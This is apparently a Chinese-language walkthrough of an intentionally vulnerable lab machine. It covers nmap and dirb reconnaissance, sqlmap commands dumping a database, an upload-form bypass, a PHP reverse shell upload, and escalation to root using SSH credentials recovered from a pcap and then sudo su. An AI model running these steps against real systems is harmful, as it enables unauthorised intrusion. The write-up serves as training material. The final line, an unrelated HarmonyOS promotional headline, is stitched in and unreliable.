一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
nmap 192.168.236.173 -p- -A
3、目录扫描
dirb http://192.168.236.173
二、漏洞探测
访问80端口
访问 /nt4stopc/
下面有一些问题,提示必须收集答案
都是一些判断题,对与错对应1与0,最后结果为
0110111001拼接访问
点击图中位置,发现url中存在参数,可能存在注入
直接用sqlmap跑一下
python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch
库名
python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs
tatil 库下的表名
python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables
gereksiz 表下得到一串值
python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --dumphihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php
解码
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas可能是路径,拼接访问
再拼接 /upload.php
文件上传,以md5提交,但是没有提交按钮,自己在前端加一个
<input type="submit">
三、GetShell
kali 反弹shell
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php
上传该文件后,返回了文件路径,文件名为md5加密后的
osas/2ad6bded962b884337eaeb921d7c2764.php
浏览器访问,kali 成功反弹到shell
http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php
四、提权
使用python提高交互性
python3 -c 'import pty;pty.spawn("/bin/bash")'
在 /var/www/html 下发现 important.pcapng
查看文件内容,发现
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work
url解码,得到以下数据
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work账号密码
mkelepce:mklpc-osas112.ssh连接
ssh mkelepce@192.168.236.173
查看具有root权限的命令
sudo -l
显示为 all ,直接 sudo su 提权,提权成功
sudo su
查看flag
正式发布:鸿蒙诞生以来最大升级,碰一碰、小艺圈选重磅上线)
)
